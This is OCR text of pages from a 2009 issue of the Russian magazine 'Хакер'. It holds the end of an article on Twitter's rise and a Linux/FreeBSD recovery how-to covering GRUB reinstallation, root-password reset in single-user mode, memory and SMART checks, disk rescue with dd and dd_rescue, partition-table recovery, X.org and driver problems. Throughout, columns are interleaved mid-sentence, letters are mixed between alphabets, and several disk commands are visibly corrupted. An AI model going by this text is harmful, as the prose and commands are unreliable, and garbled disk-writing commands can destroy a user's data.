Дo~! Саголла и оказался совершенно прав. ста, подождите немного и попробуйте еще раз». того как сервис стал одним ИЗ инструментов в

Камешком, породившим настоящуюлавину, стал Сетевое сообщество, уже изрядно пристрастив­ предвыборной борьбе (многие политики завели
ежегодн ый фестиваль музыки, кино и интер­ шееся к сервису, не преминуло породить КУ4У tWltter-аккаУНТbI), серверы только каким-то
активныхтехнологий 50uth bySouthwest. Пока карикатур на данную тему. 4УДОМ не на4али снова падать. П и к активности
длилось мероприятие, шепот,ДО ЗТОПDлишь робко при шелся непосредствен но на день выборов ­
шелестевшийо TwitterB интернете, перешел ДЕНЬ ВЫБОРОВ посещаемость подскочила на рекордные 43%1
в быстро нарастающийгул. 5XSW - один из Пол ностью избавиться оттеХНИ4еских проблем
крупнейших музыкальных фестивалей в США, так удалось только к 2008 roAy, сделав необходимые КУПЯТ НЕ КУПЯТ
что его всегда очень красочно освеща ютв СМ И изменения ВДlЗижке и переехав на серверы Воттак незаметно мы добралисьдо нашихдней.
и, коне4НО, в Сети. Twitter же помогупроситьпро­ Аmаzoп 53, В целом, именно 2О08-й, стал для Можно, конечно, еще долго сыпать цифрами и

цесс "написанияпоста в блог» до макси мума, а на Twitter реша ющим годом. Сервис не только переч ислять статистические рекорды Twitter, но
SXSW оказалось немало пользователей молодого продолжилстремительныйрост, поража~ если взглянуть на картину в целом - сервис мало

сервиса. Твиттеряне-первопроходцы комменти­ даже собственныхсоздателей,но и вошел в изменился за последн ий год. Появился лишь ряд

ровали шоу в режиме реального времени,уСТрОИВ фазу активных перемен. Так, в свете растущей приятных дополнен ий, вроде нормального по­
практически живой стриминги координировали популярностиот Obvious Согр отдел илась иска, который разработчики попросту выкупили
свои действия с помощью того же Twitter. В итоге, самостоятельная компания Twitter Iпс., которую у другой команды и прикрутили К са Йту. В штате
детище Дорси заработало на фестивале награду возглаЕИЛДжекДорси,а Obvious в зто время Twitter Inc. сейчас работает порядка 30 человек и,
«best blogging tool» и, что более важно, - рекламу. поглотила ПО4ТИ не подающая признаков жизни какни странно, они пока не стали миллионерами,

С зто го момента интерес к Tw,tter принялся расти Odeo. Примернотогда же у Twitter появились хоть их компанию и оценили в 250 миллионов
в геометрическойпрогрессии. и новые инвесторы. По некоторым прогно­ долларов Twitter до сих пор не монетиэировался,
Еще несколькокрупных событий 2007 года, таких зам, стоимостьсервиса с каждым годом будет если, коне4НО, не считать монетизациейнедав­
как MТV М usic Awards и Apple WWDC 2007, завер­ возрастатьна миллиарддолларов(правда, 1'10 нее открытиеяпонскогофилиала 'NWW. twitter.jp,
шили начатое SXSW, заставив весь мирзагово­ други м прогнозам. через нес колько лет сервис где «все тоже самоетолько на японском и с рек­

рить о TwitterKaKo новом уникальном явлении. не будет стоить ничего :IJ. Перспективный дот­ ламой». Был ли зто пробный шар, или поводом
Число пользователей стремительно росло­ ком поспешили поддержать весьма известные в действительно послужила огромная численность

всем хотелось попробовать «эту новую штуку" В Кремн иевой долине вен чурные фонды - Uпiоп японского ТЕипер-сообщества, неизвестно. Да­
действии. Кделу продвижения Twitter в массы, SquагеVепtuгеs, Charles RiverVentures, Digital вать какие-либо комментарии по поводу возмож­
помимо «сарафанногорадио» ПОДКЛЮ4ИЛИСЬ Garage, Spark Capital, а также инвестиционная ной схемы получения oTTwitter денег, Дорси и его

СМИ. В результате,у сервиса началисьпробле­ компания Bezos Expeditions, принадлежащая коллеги неторопятся.А междутем, эта проблема
мы с работоспособностью.Хоть разработчикии Джеффу Безосу - основателю Аmаzoп.соm. А не так уж проста, ведь многие юзеры пользуются

ожидали, что их детище в один прекрасный день разработчики в зто время не только супоением сторонними twittег-клиентами,минуя сайт или,

станет популярным, н О к такому безумиюока­ медитировали на цифры посещаемости, но и вообще, «общаются» с сервисом через SMS.

ХАКЕР 06 11261 09 ~ 081

Говоря о деньгах, нельзя не упомянуть, что
безостановочнорастущий дотком уже пыта­
лись купить. В началетекущегогода Facebook
предлагал за Twitter пол миллиардадолларов,
но не деньгами, а своими акциями. По каким
имен~о причинам руководствоТWlttеготвергло
зто предложение - неизвестно, ~o многие ана­
литики сходятся во мнении, что акции Facebook
сильно переоценены. А в последний месяц и
вовсе появились слухи о том, чтотеперь TWltter
ведет переговоры с Google, но никаких коммен­
тариев и подробностей ~e последовало.
Ну а в Сети, тем временем, как грибы после
дождя, появляются твипер-клоны (кто-то,
возможно, предпочтет формул и ровку «другие
сервисы для микроблоггин ra»l. Как бы там
ни было, пока ни один из них не представляет
для Twitter серьез~ойугрозы - «Чири калка»
уверенно оставляет позади всех KO~KypeHTOB.
По последним данным, Twitter занимаеттретье
место по популярностисреди социальн ЫХ сетей
[Facebook и MySpace все ещелидируютi, и су­
масшедшая цифра годового при роста пользова­
телей - 1382% сsидетельствует, что в будущем у
него есть все шансы возглавить зтоттоп.
ПУСТЫШКА
ИЛИ ГЕНИАЛЬНОЕ
ИЗОБРЕТЕНИЕ?
Об истории и становле~иисервиса уже сказано
более чем достаточно, но, кажется, ответов
на поставленныев ~ачале вопросы мы так
и не получили. Чем же Twitler превосходит
другие средства сетевой коммуникации,откуда
взялась сумасшедшаяпопулярностьи в чем
удобство и привлекательностьмикроблоrгинга?
На самом деле, вывод напрашиваетсянеутеши­
тельный - похоже, сегодня модно и удобно быть
ленивым. Нет, разумеется, у медали TWllter есть
светлая сторона.
Короткие сообщения максимально инфор­
мативны и начисто лишены «воды» (которая
просто не умещается в 140 символов). Плюс,
TWltter порой реагирует на события, про­
исходящие в мире, быстрее любых СМИ. и
помогает максимально быстро получать и
сортировать практически любую информацию.
Если приводить глобальные и наиболее яркие
примеры, то во время террористического акта
в Мумбаи, произошедшего в 2008 году, свиде­
тели происходящего отправляли по -·80твитов
в 5 секунд, докладывая обстановку, а другие в
зто время помогали составлять списки убитых
и раненых. Похожая ситуация сложилась и с
рейсом 1549, который в начале 2009 года со­
вершил аварийную посадку на воду реки Гуд­
зон, в Нью-Йорке - один из очевидцев сделал
фото места катастрофы и отправил его в Twitter
еще до того, как на место прибыли спасатели и
пресса. При годился Twitter и австралийским
пожарным, когда в начале 2009 горела едва
ли не вся Австралия - с помощью сервиса
население оператив~о оповещали о текущей
обстановке в охваченных пламенем зо~ах> И
подобных примеров наберется немало.
Однако если не принимать во внимание
~ 082
!/ 0[(;( ""
I cI'<5"'1'~ <.1.,3'
,1
j/
СЗJJ!Jf c~
l'
/
~";'1:l1 ·... Н.'·
Факты
чрезвычай~ые ситуации и рассматривать
Twitter не ка к удобный инструме~т, С помощью
и цифры
которого МОЖНО быстро и оперативнодонести
информациюдо«всея интер~ета»,то картина
вырисовываетсяне столь радужная Доста­
точно взглянуть на списки людей, которых
актиsнее scero «фоловят» [от а~гл. foHow­
«следоватьза кем-то». Фолловеры в Twitter
- аналогфрендов sЖЖ): Бритни Спирс, Опра
Уинфри, Эштон Катчер [Катчер, кстати, не­
давно поставил рекорд и первым взял пла~ку
в миллион Фолловеров), Арнольд Шварце­
неггер, Барак Обама, ЭЛ Гор и далее, далее,
далее ... ВН!-1ма~ие к Twitter сейчас во многом
привлекаютзнаменитости, которых здесь в
избытке. Мы совсем ~eдaB~O писали О том, что
после пришествия в Тwittегужеупомянутой
теле8едущейОпры Уинфри, сервис струдом
выдержал наплыв американскихдомохозяек.
Шу'гка ли, вденьее регистрации посещае­
мость подскочила на 24%, и уже через 2 часа
у миссис Уинфри было 100.000 фолловеров.
Из этих цифр и другой похожей статистики
напрашивается довольно очевидный вывод
о конти~ге~те сервиса. Само собой, интерес­
ные люди есть 8езде, и я даже составила для
тебя небольшой список, кого стоит почитать,
но все же общая тенденция не слишком
радует Читатьлайфстрим людей, которые раздутой из ничего, vo гениальным изобре­
педантично рапортуют отом, что выпили кофе, тением. Хотя сер8ИС и строится на давно
позавтракали, сходили в магазин, посмотрели известных и проверенных вещах, это не
какой-то фильм и т.п. - сомнительное удо­ отменяет того факта, что он может быть
вольствие. И таких едва ли не большинство. полезен, интересе~, а главное - очень
Вданном случае ограничение в 140знаковрабо­ оперативен. Иметь twittег-аккаунт сегодня
тает скорее против TWltter. чем за. Ритм современ­ удобно: одно дело читать с мобильника
ной жизни диктует свои условия, и зачастую чем ленту друзей в ЖЖ и совсем другое - читать
компактнее подана информация, чем проще ею ле~ТУТWlttег. Из-за подобной доступности и
поделиться. а чем быстрее она «проглатывается». простоты микроблоги В будущем явно про­
тем лучше. Но все же краткость не всегда сестра должат пользоваться популярностью (зто не
таланта, И стиль те KC1'a а-ля SMS - без знаков значит, что они затмят собой обычные блоги
препинаний, с кучей сокращений, упрощений и социальные сети, а затем поработят мир,
и едва ли не 1337'ом, уместен далеко не всегда. ведь с появлением кино люди не перестали
Тwittегже, фактически, принуждает своих юзеров читать и ходить в театр, а после появление
писать именнотак, ведь на счету каждый символ. интернета не умерли печатные СМИJ. Прос­ t=1!,~:
Подводя итог, скажу, что, пожалуй, равно то не нужно забывать о том, что порой 140
ошибочно называть TWltlef' и пустышкой, символов недостаточно Х
РЕ
Л,
ХАКЕР 06 11261 09
 ·,

~.
Р:i:::я на осуществление тел:~изи:нного вещання Серия ТВ
I
}
•
.
N!7632 от 16.0;.2003. выдана Минпечати рф.
bl .; ~ ,­
 [ОГЕНИЙ «J 1М» ЗDБНИН
/ZOBNI NIi!G"4AIL.COM/

МАСТЕР-КЛАСС
ПО РЕАНИМАЦИИ
НИКСОВ
M1eToAbI борьбЫ со сбоями Linux и Free'BSD

UNIХ-подобныеоперационныесистемы устроены так, что если

в них что-то ломается, то они не пытаются самовосстановиться,

а честно сообщаюто случившемся.Дальнейшая судьба операци­

онки зависитот квалификациивладельца компа: новичок сразу
затеет переустановку,матерый же юниксоид спокойно загрузится
с L'iveCD, наберет в терминале несколько команд и отправит комп
на перезагрузку, довольно усмехнувшись. Дизайн UNIX настолько
прост и прямолинеен,что ОС можно поднять с колен, в каком бы
состоянии она ни находилась .

• Всего существуетшесть классов проблем, с

которыми сталк!'tваютсяпользователиниксов:
другой операционнойсистемы уже возведе­
на в разряд запрещенной к обсуждениюна
Команда «find /boot/grub/stage1», введенная
в ответ на приглашениеgrub, должна выдать

1. Загрузка. Затертая запись М BR, забытый многих тематическихфорумах, попала в мно­ на зкран имя дискового раздела, содержащего

парол ь root. гочисленные FAQ и глубоко сидит в печенках каталог /boot/grub. Далее все просто:
2. Оборудование. Подвисания и самопроиз­ опытных пользователей. Нет в нашей стране
вольная перезагрузка ОС, паника ядра новичка в Liпuх, который бы ни разу с ней не root дисковый--раЗДGЛ

3. Винчестеры. Затертая таблица разделов, сталкивался. А междутем, решение очень про­ setup (fldO)
выход из строя жесткого дис ка. стое: достаточно загрузиться слюбого Linux qu.it

111 4. Графическая подсистема, Неправильная

настройка хогg.сопf, отсутствующий видеодрай­
вер, тормоза.
LiveCD. открыть окно терминала и набрать
заветную команду: Куда реже страдаютот проблемы затертого
загрузчика пользователиFreeBSD, нотакое
5.ДраЙвера. Все, что связано с нераспознан­ $ sudo grub-install /dev/sda случается и в с ними. Anгоритм восстановления

ным оборудованием. записи MBR тут несколько иной:

6. Сеть. Неправильнаянастройка сетевых ин­ в большинствеС!'tтуаций зтой команды будет 1. Загружаемся с первого ил и восстановител ь­
терфейсов. неработающийОNS-резолвинг. достаточнодля возвращениязагрузчика на ногодиска FreeBSD.
Мы рассмотрим способы борьбы с каждой из законное место. Но если вместо глубоко"ыс­ 2. Выбираем пункт меню «Flxit», далее «CDROM/
зтих проблем. ленного молчания gгuЬ-iпstаllразразитсябран­ DVD».
ны
ии ругательствами­ дело плохо l Придется 3. Набираем 80ткрывшейся командной строке
КОГДА ПИНГВИН ОТКАЗЫ­ запустить командную CTpOKygrub: «bootOcfg -о packet adO && exit».
ВАЕТСЯI ВЫХОДИТЬ НА СТАРТ 4.Жмем на системном блоке кнопку Reset.
Пробле.,а затертой записи MBR загрузчиком $ sudo grub С MBR все. Теперь поговорим о забытом пароле

~ 084 ХА.КЕР 06 11<61 09

 строчек, СИГfiализирующихо сБОЙfiЫХячейках
Частые саМОПРОИЗВОЛЬfiыеперезагрузки
маШИfiЫ, особеfifiО во время запускатяжелых
приложений или игр, - следствие перегрева

процессора или видеокарты. Проверь работос­

пособfiОСТЬ кулеров и, в случае fiеобходимости,
эамеfiИ их. Если времени fia зту процедуру нет,
а работать надо, попробуй снизить частоту
&xit \~is aenu (l'etul'njp~ tO.p-l'еviоus) процессора или чипа видеокарты. Мfiогие
i'Р'.'iiНiid 'ii'ii!4*""jШ il)ЮН _ С08ременные процессоры и матеРИfiские
Use « П.ор.ру genel'ated 11'0Ш tbe r i)'ljt illl4.gl!
Stal't «п E~rgency Hologl'«pHie SЪ~ll платы ПОЗоВоля ют изменять тактовую частоту

процессора «на лету", без перезагрузки компа.

Обычно для этого предоставляется специаль­
ны
й интерфейс, расположенны
й в fieApax ка­

талога /sys в Linux или 8 ОДНОЙ И3 ветвей sysctl

ЗАПУСКАЕМ СПАСАТЕЛЬНУЮ КОНСОЛЬ FREEBSD во FгееВSD_Для манипулироваfiИЯ частотой и
другими характеристиками видеопроцессора

ПРИfiЯТО использовать кроссплатформенную

пользователя root. Ка«же юниксоидылюбят явившейсястроки слово поар1С и fiажатьЪ' Для утилитупvсlосk. Запусти ее с флагом '-s', чтобы
выдум ывать дJ1иfiны
,' за путанные па рол и, фиксации изменений OTKpblBaeM файл/ЬооtlgгuЬ/ УЗfiать текущую частоту GPU:
а потом с успехом их забывать. и как же они grub.conf и добавляем noapic ко всем строкам,
радуются, узнав, что для восстановления па­ наЧИfiающимся со слова kегпеl. Если и это не =::. пvсlосk -s
роля достаточно вы пол fi ить всего два простых поможет, полностью отключаем АСРI через опцию
действия. А именно - загрузиться в однополь­ «acpl=off". Для FreeBSD достаТОЧfiО нажать кла­ Азатем СfiИЗЬ ее примерfiО на 100 МГц:
зовательском режиме и удалить па роль из базы вишу '2', когда появится меfiЮ загрузчика, а затем
пользователей с помощью KOMafiAbI vipw. зафикси ровать измеfiеfiИЯ, добавив строку «hlпt. # nvclock -п 300
В Liпuх вход в однопользовательский режим apic.Q.disabLed= 1» вlоаdеr:сопf:
осуществляется за С'1ет передачи ядру опции ВИНТЫ ПОСЫПАЛИСЬ
siпglе Выбери в grub нужный пункт меню. ~ echo "hint.apic.O.disabled=l" » Пользователисо стажем Зfiают, что диа па­

нажми ·е'. добавь в конец появившейся строки /boot/loader.conf зонпроблеМ,свяэаfifiыхсиспользованием

слово siпglе и нажми < Еп ter>. Ядро благопо­ жесткихдисков, очеfiЬ широк и простирается

ЛУЧfiО загрузится и запустит /ы
//hh от имени ПериодическиеподвисанияопераЦИОfifiОЙ от механическогоповрежденияв результате

суперпол ьзователя. Вы пол н и команду vi pw, системы или постоянные уходы ядра в панику удара до случаЙfiО потертой таблицы разде­

сотри звездочку в поле пароля пользователя могут свидетельствовать О том, что оператив­ лов. В некоторых из них ВИfiчестереще можно
root. выйди из редактора и fiабери exit, fiая памятьдышитна ладаfi. Если подвисания вернуть к жизни, fiO В БОЛЬШИfiстве случаев он
Чтобы попасть в однопользовательский режим случаются с пеРИОДИЧfiОСТЬЮ раз в час или либо уже умер, либо находится в предсмертном
FreeBSD, требуется fiажать '4' в ответ fia загру­ тридцать минут, скорее всего, погорели только СОСТОЯfiИИ. Чтобы не попасть впросак, специ­
ЗОЧfiое меню или набрать «bool-S» в KOMafiA­ fieKoTopbIe ячейки одной из плаfiОК. В случае алисты рекомендуют периодически проверять

fiОЙ строке загрузчика. выхода из строя всего модуля памяти ядро состоя fi ие жесткого диска, испол ьзуя утилиты

уйдет в паfiИКУПРИ следующей же загрузке! для отображения статистики S.M.A.R.T.. специ­

ЖЕЛЕЗНАЯ БОЛЕЗНЬ Проверить па мять на сБОЙfiОСГЬ fi е соста вляет ального чипа, Bcrpoefifioro в жесткий диск. 8
Часто ядро отказываетсязагружатьсяили кор­ труда. Самый ПрИМИТИВfiЫЙ способ - запа­ 'пiх-системах тоже есть такие утилиты, самая
ректно работатьпо причине кривой реализации ковать и распаковать большой объем AafifibIx, известная из которых имеfiуется smartctl.
ACPIB чипсете или ВЮS'е материнской платы напри мер, дерево ИСХОДНЫХ текстов ядра: Пакетsmаrtmопtооls,содержащий программу

Раэработ~и ки операЦИОfiНЫХ СVoстем уже устали smartctl, предустановлен почти в любом дис­

ругаться по этому поводу; ядра Liпuх и FreeBSD $ tar -czf -/src.tar.gz /usr!src &.& трибути ве Llnux, а во Free 8SD доступеfi через
содержат даже не десятки. а сотни воркзраУfiДОВ tar -xzf ··/src. tar. gz систему портов [sysu ti ls/sma rtmontools).
для материнских плат, облада ющихтакой fiепри­ Запустим smartctl:
ятной особенностью. Однаmочевидно. что С мо­ СБОЙfiые ячейки памяти вызовут коллизии
мента поступления материнской платы в продажу при сверке КОfiТРОЛЬНЫХ сумм. и архиватор без # smartctl -д /de,,/sda
и до обfiаружеfiИЯ в ней ош ибок ПРОХОДИТ какое-то замедлеfiИЯ сообщит об этом.

время, поэтому не стоит fiадеяться, что твоя Другой [более правильны
]] способ проверки В появившейся на экраfiе табл и це нас Иfiтере­
свежекуплен fiая бажная АSUSуже есть в ~epHЫX заключается в иСПОЛЬЗО8аfiии профеССИОfiаль­ суюттол ЬКО Д8е СТРОКИ: RealLocated_Sector_Ct
списках ядра. Проблемы с АС PI и ПОДКОfiТРОЛЬ­ fiOrO Иfiструмеfiта memtest86. Это само­ и Temperature_Celsius. В ПОСЛеДfiей колонке
fibIM ему Ю-АРIС могутпроявляться по-раЗfiОМУ: достаточная программа, которая нетребует первой из fiихотражеfiО количество переназна­

периодические за висания ОС, неработающие операЦИОfi fiОЙ системы
,цf1Я своей работы Ofia чеНfiЫХ секторов. Зfiачеfiие, отличное от fiУЛЯ,

клавиатура и мышь, сообщеfiИЯ ядра "м P-BIOS ИЗfiачально присутствует 8 меню grub мfiОГИХ говорит о проблемах. Диск начинает сыпаться, и
bug' 8254 timer поt соппесtеd to IO-APIC", fiO чаще дистрибутивов и LiveCD Linux Просто перезаг­ число переназначенных секторов будеттол ько

всего «желеЗfiЫЙ бар' даето себе знать уже fia рузи маШИfiУ и 8ыбери ПУfiктменю memtest86. расти. ПослеДfiЯЯ КОЛОfiка строки Temperature_
этапе установки ОС. Инсталлятор просто входит в Проверка памяти начнется автоматически. Celsrus содержиттекущую температуру жесткого
ступор вовремя копироваfiИЯ файлов. Программа memtest86 использует множество диска, которая fie ДОЛЖfiа превышаТI> 50- ти
К счастью, зто легко обходится через ЯВfiое различных алгоритмов тестироваfiИЯ, позтому градусов [36-45 градусов - идеальные условия!
отключеfiие APIC и/ил и ACPI в ядре. Для Linux ПРО8ерка можетзатянуться fiадолго. PeKoMefi­ Зfiачения S.M.A R.т. - это 8сеголишь цифры.
необходимо выбрать нужный пункт меню в дую запустить memtest86 на ночь, лечь спать. которые далеко не всегда имеютсвязь С реаль­

загрузчике grub, fiажать'е', добавить в КОfiец по­ а утром проверить, fieT ли в выводе Kpacfiblx НЫМ состоянием жесткого диска. Более того,

ХАКЕР 06 /126/ 09 ~ 085

 !mdill 1/1 t'"\:~
- (j i m@10ca1ho51:) - (~)­
- (О: О) -> Hconf; 9

1;'~
ofeO: f1 а95=884 3<UP, BROADCAST ,RUNNING, SIMPLEX, MUL ТIСА5Т> теп;с О Пl1:u 1500 I .
ор1: i On5=8<VLAN-.МТU>
e1:her 00:11:d8:52;61;94
; ne! 172 .16.67.143 oe1:mask OxffffeOOO broadca51: 172.16.95.255
l'
i
GRUВВКАЧЕС~
ВЕ3АГРУ3ЧИКА
med; а: E1:he,'ne! а""05е1еС1: (100baseТX <fu11-dup1ex»
status: act:ive
р 1; рО: f1 ag5=108810<POINTOPOHIT ,SIMPLEX, MUL ПСАSТ ,NEEDSGIANT> те1: г; с О ",1:" 1500
100: f1a9s=8049<UP,LOOPBACK,RUNNING,MULТICAST>me1:r';c О m1:U 16384
;ne1:6 fe80::1%100 prefix1en 64 scopeid Ох3
;ne1:6 ;:1 pref;x1en 128
i пе1: 127. О .0.1 netma5k OxffOOOOOO
ogO: flags=88dl<UP, POINTOPOINT, RUNNING, NOARP, SIMPLEX, МULПСАSТ> те1:Г; с О rn1:" 1456
FREEBSD
;"е1: 10.103.67.143 --> 172 .16.96.1 "е1:Пlаsk O"ffffffff
- (j;ПI@10саlh051:)-(_.)­
-(0:0)-> • ЗагрузчикgruЬприcyrствуетпдеревепортоп
FreeBSD. Его можно использовать вместо стандарт­
РЕЗУЛЬТАТВЫЗОВА IFCONFIG БЕЗ АРГУМЕНТОВ ного bootO. Файл !boot/grub!memL.lst в этом случае
должен выглядетьпримернотак:

title FreeBSD
исследования,проведенныекомпанией Google, показали. что root (hdO,O)
в 60% процентах случаев вероятность гибели дисков никак не сhаiпlоаdеr +1
свяэана со значениями S.М.АЯ Т.. а единственный более-ме­
неедостоверный показатель - зто количество переназначен­

~ info
• Сыплющийся, но
еще работоспособ­
ный жесткий диск
вполне пригоден для
ных секторов. Но что, если дискуже почти умер, а информация
не может быть восстановлена из-за повторяющихся ошибок
чтения или перемещения головки? Тогда ГlрИ попытке коп,,­
рования файлов ядро завалит dmesg сообщен"я ми
а кома нда ср просто возвратитошибку. Для начала следует
поп робовать отмонти ровать раздел и слить и нформацию с
помощью dd на ДPYГO~I жесткий диск [здесь и далее /dev/sda ­
ПРИЧУДЫ МИСТЕРАХ
За последнее время X.org стал на порядок интеллектуальнее, и
проблемы с ним уже не являются серьезным препятствием. Те­
1/0 еггог, перь Х-сервер умеет автоматически находитьустройства ввода,
подбирать правильные разрешение" частотуобновлен"я для
монитора. 80 многих дистрибутивах настраиватьего вообще
не нужно, установочные скрипты сами генерируют правиль­

хранения временных сыплющийся диск.ldеv/sdЬ - новый диск) ную конфигурацию. Но время ОТ времени Х-сервер дает сбо".
AaHlibIx. Для зтого Причем. зачастую виновным оказывается сам пользователь
надо потереть табли­ # дд if=!dev!sda of=!dev!sdb conv~noerror,sync или с"стема обновления пакетов. Если после загрузки вместо
цу разделов привычного окна лоnина ты ВИДИLIJЬ скуч ную черную консоль,

и создать новый
раздел на уцелеВLIJей
части диска.
• Чтобы убрать
загрузочный экран
и увидеть процесс
инициализации LIПUХ
во всей красе, удали
опции quiet и splash
из строки. доступной
по клавише е
в загрузчике grub.
Если кол"чеСТ80сбойныхсекторов на диске невелико.то
dd скопирует диск, заполнив проблемныеучастки нулями.
После этого останется только выполнить fsck для всех фай­
ловых систем И жить дальше с новым д"ском. К сожалению.
трюк с применением dd срабатывает не всегда. В некоторых
ситуациях диск оказы вается поврежденным настолько, что
сбойные участки простираются на сотни тысяч ИЛИ даже
миллионы секторов подряд! Завершения отработки dd при­
дется ждать нескол ько дней, за которые подопытный впол не
можетскончаться. Лучшие умы планеты советуют исполь­
зовать специальную утилиту dd_rescue. с помощью которой
можно провести коп"рование диска С двух сторон. первый
проход с начала диска, второй'- с конца. В результате на
новом диске окажется вся информация за исключением
значит, процедура запуска сервера завершиласьс ошибками.
Этому может быть сотня приин, начиная ОТ отсутствия необхо­
димого драйвера и за канчивая проблемам" с каталогом /tmp.
Самое разумное,что можно сделать - попробовать повторно
запуститьХ-сервер командой starix и посмотреТЬ,какие
ош ибки она выдаст на экран. В большинствеслучаев этого
оказываетсядостаточнодля диагностики проблемы, но если
причины сбоя остаются загадкой. следует обратиться за более
подробным разъяснением кфайлу /var/Log/Xorg.O.!og:
# grep ЕЕ !varl1og;Xorg.O.10g
Записываялоги, Х-сервер помечает все ошибки маркером
"(EEI,,, так что приведенная команда вы ведет тол ько записи,

проблемногоучастка. Делаем первый проход: сигнализирующие о проблемах.

Если чувствуешь, что ошибки самоетоятельнотебе не

I~ dd_rescue -у -у 1G -1 sda. 10g -о sda. ЬЬ \

исправ"ть. просто выполни команду«Х -сопfiguге», которая

Idev!sda !dev!sdb
сген ерирует новый конфигурацион н ый файл X.org.

Кроме сбоев. Х-сервер может злементарно тормозить. В

Когда дис к начнет безум но шелестеть, нажм ем <Ctrl +С>, что­ этом случае винить следует уже не пользователя или дист­

бы заверLIJИТЬкопирован"е, и запускаем процесс копирова­ рибутив, а видеодрайвер. Современные графические тул­

н"я с конца: киты и некоторые среды рабочего стола (КDЕ4, например]
практикуют переклады вание части работ по отрисовке

I
# dd_rescue -r -v -у 1G -1 sda.10g -о sda.bb\
графики на плечи граф"ческого ускорюеля. Выливается
!dev!sda !dev!sdb
зто в скверные показатели производительности в систе­

мах. видеодрайвера которых не поддерживаютфункции

Останавливаем процесс копирования после продолжи­ 2D/ЗD-ускорения В частности. этим страдает стандарт­
тельного шелеста диска и отключаем умирающего. Другая Ный ПVldlа -драйвер пv. Чтобы решить п роблему. зайди

проблема - утрата табли цы раздело в. которую еще совсем на са йт ПVld la.com и скачай последнийдрайвер для своей

недавно было принято решать с помощью шестнадцате­ ОС или сделай то же самое через системууправления

р"чного редактора. Сегодня же проще применить утилиту пакетами.

gpart.
mпаТЕРЯННЫЙ ДРАЙВ:ЕР
# CJpart -и !dev!sda !de'v!sda Современные версии Liпuх и FreeBSD под завязку набиты
драйверами даже для самого зкзотического оборудования.

Альтернативаgpari -. testdisk. более мощная" гибкая про­ Дни, когда для этих операц"онных систем приходилось

грамма с псевдо-графическиминтерфейсом. индивидуально подбирать конфигурацию компа, прошли.

~ 086 ХАКЕР 061"126/09

{tQ:@pcIO:O:4:0; class-охО20000 card..ox80a7104} сhiр .. ОхОО6бl0dе геv-оJ.;;ll hdr..oxOO
vепdоr _ 'Nvidia Согр'
dcvSce _ ~МCf-T ЕФs:rD!"t ,Дфриr фiр IО/100/НQ/Fр_дчtо'jjtDS$" ~estDisk 6.10, Oa~a Recovery u~ili!y, July 2008
class
sub~la5S
.. ne:tworJ:.
_­ ethernrt
Christophe GRENIER <grenier@cgsecuri~y.org>
hccp://www.cgsecuricy.org

ВЫВОД PCICONF: НАС ИНТЕРЕСУЕТ ИМЯ Disk /dev/adO - 120 GB / 111 GiB - CHS 232581 16
Сuггепс parti~ion STrUCcure:
УСТРОЙСТВА, ПОЛНОЕ И СОКРАЩЕННОЕ Рагtiтiоп STarc End
- -: I • 6: ... .~

~агп; ng: Bad end'j пg head (CHS and LBA don' t macch)
.. laming; ~hort N'мJ ~,\!" sеottогQН-4Н-4S'3), iio'SU byo;t~ inst,~d QT 6fШВ. skipping... f'.rаП1iпg: Incorrect питЬег of heads/cylinder 255 (NTFS) != 16 (но)
IlIdsmn.
2 Р HPFS - NTFS 20798 7 1 31205 9 63 10490445
o:heclti"9 I:~п;tiоn.s .•.

f'.rarning: Bad s~ar~ing head (СН5 and LBA don'c macch)

3 Р FreeBSD 41612 13 1 232575 14 63 192490830

~arning: Bad s.arcing head (CHS and LBA don'~ match)

<i... ts~dj:l
P",1iNoI1P I 4 Е ex~ended 31205 10 1 41612 12 63 10490445
3~:;
dls: ~arning: Bad s~arting head (CHS and LBA dоп' т ща~сh)
pri~rYJ)dгtitiO/\(2)
Q'Pe~ OOHOxOJ){osl2 "~, КCFS, CI'« O~ ю.r...,~ 1IЮ;.)
I Next
$ile~ 5UZrb fs(1049O«O) s(Z0964BH-}.НИ2t)4)

.0
c;ili: (10В/l.50/б3)-(10нns/б))d (lO~8/1/1)·{3UОS/9/Щг

pr1l1U.ry~i'tion(3)
[ Backup
~fz:~ ~~Х~ШW~~Ы"~3~$~И~~~~14) тгу loca.e par~icion
oths: (1023/15/63)~(1~)/1516~)d (ШОS/U/l)-{3И81rJJj'58)г

ВОССТАНАВЛИВАЕМТАБЛИЦУРАЗДЕЛОВС ПОМОЩЬЮ
РЕЗУЛЬТАТ РАБОТЫ GPART TESTDISK

Сегодня LIПUХ и FreeBSD легко встают на любой COBpe~eH­ Проверь. загрузилсяли дра.Йвер:
ный сервер,до~ашний компьютер или лэптоп и нетребуют
специального конфигурирования. Загвоздка лишь в том. что 11- пdisитаррег -1
драйвера для «железных новинок» появляются С некоторым

опозданием. что вполнезаконо~ерно. но неприятно. Все в порядке? Загружай модуль и конфигурируйсеть.

Еслитвоя свежекупленная железка никакне проявляет

работоспособl-ЮСТЬ, значит. ядро не подхватило ее во время 11- modprobe I1dis,..rapper
загрузки. Такое может произойти в двух ситуациях: либо
драйвер не был загружен во время инициализации системы. ЛАТАЕМ СЕТИ
либо драйвера для такого устройства нет 8 ядре или ~одуле. Пробле~ы с подключением~ сет" - бич новичков в Linux.
В любом случае следует опросить шину PCI на предмет Большинство дружелюбных к Гlользователю дистрибутивов ~ links
найденныхустройств и загруженныхдрайверов. Для зтого находятсетевые интерфейсы сами и пытаются настроить • Спасательный
можнО использовать утилиту lspCl в Liпuх или РСlсопf во их средства ми О Н СР. С рабатывает зто далеко не всегда. загрузочный диск­

FreeBSD' Перво-наперво запусти команду «dmesg Iless» в LIПUХ или W\Nw.sysresccd.org.

«lеss/vаг/гuп/dmеsg.Ьооl»во FreeBSD и найди в ее выводе
1inux# lspci -v сетевой адаптер. который ты V1спользуешьдля выхода в • Восстановитель
freebsdJl. pciconf -1 -v интернет или локальную сеть. HaГlpV1Mep: таблицы разделов
gpart - ~ww.brzit\"a.
На зкране ты увидишь все найденныево время инициа­ nfeO: <N\TIDIA nForce2 ИСР2 Networking Adapter> ~.
лизации ядра устройства И закрепленныеза ними модули port ...
[драйвера). в первом случае имя ~одуля будетуказанов • Tesldisk - уни­
строке «KeГГlel modules:», во втором - в первой строке Первое слово - зто название сетевого V1нтерфейса (в LIПUX версальная утилюа

каждого устройства. J.
Он будет именоваться elhO или eth 1 Запусти команду ifconf'lg для восстановлен и я

В моем при~ере слово nfeO в самом начале отражает без аргументов и найди в ее выводе зто название. Если его всего И ВСЯ - ~

имя устройства !сетевая карта) и закрепленный за ни~ нет - значит. интерфейс неактивен; если же в выводе нет ~<;_urity_qrg!wiki/
